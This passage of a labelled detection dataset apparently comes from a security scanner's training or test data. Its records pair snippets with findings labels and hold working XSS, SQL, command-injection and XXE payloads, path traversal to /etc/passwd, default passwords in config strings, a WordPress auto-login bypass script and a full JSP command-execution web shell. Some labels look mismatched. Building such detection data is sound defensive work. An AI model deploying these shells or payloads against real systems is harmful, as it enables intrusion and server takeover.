[{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <A HREF=\"//www.google.com/\">XSS</A>", "injection_type": "XSS"}}]} {"id": "seclists_03057", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><form><button formaction=javascript:alert(1)>click</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form><button formaction=javascript:alert(1)>click", "injection_type": "XSS"}}]} {"id": "seclists_03058", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<sup onmouseenter=\"alert(1)\">test</sup> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<sup onmouseenter=\"alert(1)\">test</sup>", "injection_type": "XSS"}}]} {"id": "seclists_03059", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=iverson\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "iverson"}}]} {"id": "seclists_03060", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<spacer onmouseover=\"alert(1)\">test</spacer>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<spacer onmouseover=\"alert(1)\">test</spacer>", "injection_type": "XSS"}}]} {"id": "seclists_03061", "source": "seclists", "source_license": "MIT", "text": "filename=&#X03c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X03c;", "injection_type": "cmd"}}]} {"id": "seclists_03062", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><col onmouseenter=\"alert(1)\">test</col></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col onmouseenter=\"alert(1)\">test</col>", "injection_type": "XSS"}}]} {"id": "seclists_03063", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=0815\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "0815"}}]} {"id": "seclists_03064", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=\") or benchmark(10000000,MD5(1))# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\") or benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_03065", "source": "seclists", "source_license": "MIT", "text": "filename=%7C%20%5B%204%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%204%20-ne%20%24%28echo%20TEUISW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C", "injection_type": "cmd"}}]} {"id": "seclists_03066", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Basic injection attack\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Basic injection attack", "injection_type": "XSS"}}]} {"id": "seclists_03067", "source": "seclists", "source_license": "MIT", "text": "filename=\"%26echo$IFSJNESPQ$((88%2B93))$(echo$IFSJNESPQ)JNESPQ%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo$IFSJNESPQ$((88%2B93))$(echo$IFSJNESPQ)JNESPQ%27", "injection_type": "cmd"}}]} {"id": "seclists_03068", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Name: Obfuscated XML predicate vector variation 3\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Obfuscated XML predicate vector variation 3", "injection_type": "XSS"}}]} {"id": "seclists_03069", "source": "seclists", "source_license": "MIT", "text": "GET /api/user?filter=%29 HTTP/1.1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%29", "injection_type": "LDAP"}}]} {"id": "seclists_03070", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%202%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%202%20-ne%20%24%28echo%20OIYJXA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_03071", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<center ondblclick=\"alert(1)\">test</center> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<center ondblclick=\"alert(1)\">test</center>", "injection_type": "XSS"}}]} {"id": "seclists_03072", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or a=a--';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or a=a--", "injection_type": "SQL"}}]} {"id": "seclists_03073", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<datalist onkeydown=\"alert(1)\" contenteditable>test</datalist> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<datalist onkeydown=\"alert(1)\" contenteditable>test</datalist>", "injection_type": "XSS"}}]} {"id": "seclists_03074", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"request_method\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"request_method\" -->", "injection_type": "SSI"}}]} {"id": "seclists_03075", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">URL Encoding</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "URL Encoding", "injection_type": "XSS"}}]} {"id": "seclists_03076", "source": "seclists", "source_license": "MIT", "text": "<?php\n@unlink(__FILE__);\n\n// Validate if the request is from Softaculous\nif($_REQUEST['pass'] != 'mv8gdj4ohqfxpu34yj5ursupfabcmvdm'){ // your password here\n\tdie(\"Unauthorized Access\");\n}\n\nrequire('wp-blog-header.php');\nrequire('wp-includes/pluggable.php');\n$user_info = get_userdata(1);\n// Automatic login //\n$username = $user_info->user_login;\n$user = get_user_by('login', $username );\n// Redirect URL //\nif ( !is_wp_error( $user ) )\n{\n wp_clear_auth_cookie();\n wp_set_current_user ( $user->ID );\n wp_set_auth_cookie ( $user->ID );\n\n $redirect_to = user_admin_url();\n wp_safe_redirect( $redirect_to );\n\n exit();\n}\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "bypass-login.php"}}]} {"id": "seclists_03077", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n{$nin: [\"\"]}}", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "{$nin: [\"\"]}}", "injection_type": "NoSQL"}}]} {"id": "seclists_03078", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Oracle,DIP,DIP,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,DIP,DIP,"}}]} {"id": "seclists_03079", "source": "seclists", "source_license": "MIT", "text": "filename=<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xml ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>", "injection_type": "cmd"}}]} {"id": "seclists_03080", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Stylesheet</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Stylesheet", "injection_type": "XSS"}}]} {"id": "seclists_03081", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\u00c3\u00bd or 1=1 --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\u00c3\u00bd or 1=1 --", "injection_type": "SQL"}}]} {"id": "seclists_03082", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf (')", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(')", "injection_type": "cmd"}}]} {"id": "seclists_03083", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \\&apos;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\&apos;", "injection_type": "cmd"}}]} {"id": "seclists_03084", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: *&apos;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "*&apos;", "injection_type": "cmd"}}]} {"id": "seclists_03085", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><th onblur=alert(1) tabindex=1 id=x></th><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<th onblur=alert(1) tabindex=1 id=x></th><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_03086", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: kishor\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_03087", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<tfoot oncut=\"alert(1)\" contenteditable>test</tfoot>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<tfoot oncut=\"alert(1)\" contenteditable>test</tfoot>", "injection_type": "XSS"}}]} {"id": "seclists_03088", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><basefont onkeypress=\"alert(1)\" contenteditable>test</basefont></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<basefont onkeypress=\"alert(1)\" contenteditable>test</basefont>", "injection_type": "XSS"}}]} {"id": "seclists_03089", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><X OnXxx=1</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<X OnXxx=1", "injection_type": "XSS"}}]} {"id": "seclists_03090", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:florian", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "florian"}}]} {"id": "seclists_03091", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><bdi draggable=\"true\" ondrag=\"alert(1)\">test</bdi></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<bdi draggable=\"true\" ondrag=\"alert(1)\">test</bdi>", "injection_type": "XSS"}}]} {"id": "seclists_03092", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%3B%20str%3D%24%28echo%20AVKIFD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23", "injection_type": "cmd"}}]} {"id": "seclists_03093", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=echo$IFSZZSSEM$((14%2B66))$(echo$IFSZZSSEM)ZZSSEM%2F%2F HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "echo$IFSZZSSEM$((14%2B66))$(echo$IFSZZSSEM)ZZSSEM%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_03094", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:christian", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "christian"}}]} {"id": "seclists_03095", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=oberon\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "oberon"}}]} {"id": "seclists_03096", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=panda\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "panda"}}]} {"id": "seclists_03097", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><base onkeyup=\"alert(1)\" contenteditable>test</base></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<base onkeyup=\"alert(1)\" contenteditable>test</base>", "injection_type": "XSS"}}]} {"id": "seclists_03098", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<s onpaste=\"alert(1)\" contenteditable>test</s> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<s onpaste=\"alert(1)\" contenteditable>test</s>", "injection_type": "XSS"}}]} {"id": "seclists_03099", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=' or ''=' HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''='", "injection_type": "cmd"}}]} {"id": "seclists_03100", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=/./././././././././././etc/passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "/./././././././././././etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_03101", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/issue\" >]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/issue\" >]>", "injection_type": "XXE"}}]} {"id": "seclists_03102", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:diamond@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "diamond"}}]} {"id": "seclists_03103", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link.", "injection_type": "XSS"}}]} {"id": "seclists_03104", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:elliott@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "elliott"}}]} {"id": "seclists_03105", "source": "seclists", "source_license": "MIT", "text": "username=;waitfor delay '0:0:__TIME__'--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";waitfor delay '0:0:__TIME__'--", "injection_type": "SQL"}}]} {"id": "seclists_03106", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Tags: general, injection, internet explorer\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, injection, internet explorer", "injection_type": "XSS"}}]} {"id": "seclists_03107", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_03108", "source": "seclists", "source_license": "MIT", "text": "password: Thomson,<BLANK>,admin,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Thomson,<BLANK>,admin,"}}]} {"id": "seclists_03109", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG SRC=javascript:alert(&quot;XSS&quot;)> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=javascript:alert(&quot;XSS&quot;)>", "injection_type": "cmd"}}]} {"id": "seclists_03110", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Lucent,root,ascend,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Lucent,root,ascend,"}}]} {"id": "seclists_03111", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \")print(`echo%20NBPPTV\\necho%20$((1%2B63))\\necho%20NBPPTV\\necho%20NBPPTV`)%3B%2525255C%2525255CNBPPTV", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")print(`echo%20NBPPTV\\necho%20$((1%2B63))\\necho%20NBPPTV\\necho%20NBPPTV`)%3B%2525255C%2525255CNBPPTV", "injection_type": "cmd"}}]} {"id": "seclists_03112", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'admin' --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' --", "injection_type": "SQL"}}]} {"id": "seclists_03113", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Backslash-obfuscated XBL injection - variant 5\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Backslash-obfuscated XBL injection - variant 5", "injection_type": "XSS"}}]} {"id": "seclists_03114", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ' (select top 1", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' (select top 1", "injection_type": "cmd"}}]} {"id": "seclists_03115", "source": "seclists", "source_license": "MIT", "text": "POST /api/import HTTP/1.1\nContent-Type: application/xml\n\ncount(/child::node())", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "count(/child::node())", "injection_type": "XXE"}}]} {"id": "seclists_03116", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<address onmousemove=\"alert(1)\">test</address> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<address onmousemove=\"alert(1)\">test</address>", "injection_type": "XSS"}}]} {"id": "seclists_03117", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = (sqlvuln)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(sqlvuln)", "injection_type": "SQL"}}]} {"id": "seclists_03118", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit String: a=/ev///</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: a=/ev///", "injection_type": "XSS"}}]} {"id": "seclists_03119", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20RCYHEM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_03120", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E", "injection_type": "cmd"}}]} {"id": "seclists_03121", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = 1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1234 \" AND 1=0 UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055", "injection_type": "SQL"}}]} {"id": "seclists_03122", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<canvas onmousedown=\"alert(1)\">test</canvas> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<canvas onmousedown=\"alert(1)\">test</canvas>", "injection_type": "XSS"}}]} {"id": "seclists_03123", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xml ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('XSS')\"&gt;</B></I></xml><SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "injection_type": "cmd"}}]} {"id": "seclists_03124", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%26echo%20DTVUWP$((97%2B67))$(echo%20DTVUWP)DTVUWP", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%26echo%20DTVUWP$((97%2B67))$(echo%20DTVUWP)DTVUWP", "injection_type": "cmd"}}]} {"id": "seclists_03125", "source": "seclists", "source_license": "MIT", "text": "username=' or uname like '%&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or uname like '%", "injection_type": "SQL"}}]} {"id": "seclists_03126", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>", "injection_type": "XXE"}}]} {"id": "seclists_03127", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#0000060 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#0000060", "injection_type": "cmd"}}]} {"id": "seclists_03128", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=exec xp HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "exec xp", "injection_type": "SQL"}}]} {"id": "seclists_03129", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<strike onblur=alert(1) tabindex=1 id=x></strike><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_03130", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HVSPQM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_03131", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FORFUZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_03132", "source": "seclists", "source_license": "MIT", "text": "<%@ page import=\"java.util.*,java.io.*\"%>\n<%\n//\n// JSP_KIT\n//\n// cmd.jsp = Command Execution (unix)\n//\n// by: Unknown\n// modified: 27/06/2003\n//\n%>\n<HTML><BODY>\n<FORM METHOD=\"GET\" NAME=\"myform\" ACTION=\"\">\n<INPUT TYPE=\"text\" NAME=\"cmd\">\n<INPUT TYPE=\"submit\" VALUE=\"Send\">\n</FORM>\n<pre>\n<%\nif (request.getParameter(\"cmd\") != null) {\n out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n OutputStream os = p.getOutputStream();\n InputStream in = p.getInputStream();\n DataInputStream dis = new DataInputStream(in);\n String disr = dis.readLine();\n while ( disr != null ) {\n out.println(disr); \n disr = dis.readLine(); \n }\n }\n%>\n</pre>\n</BODY></HTML>\n\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "jsp", "filename": "cmd.jsp"}}]} {"id": "seclists_03133", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=+%00 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "+%00", "injection_type": "cmd"}}]} {"id": "seclists_03134", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<label onmouseover=\"alert(1)\">test</label> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<label onmouseover=\"alert(1)\">test</label>", "injection_type": "XSS"}}]} {"id": "seclists_03135", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&#X3c HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": 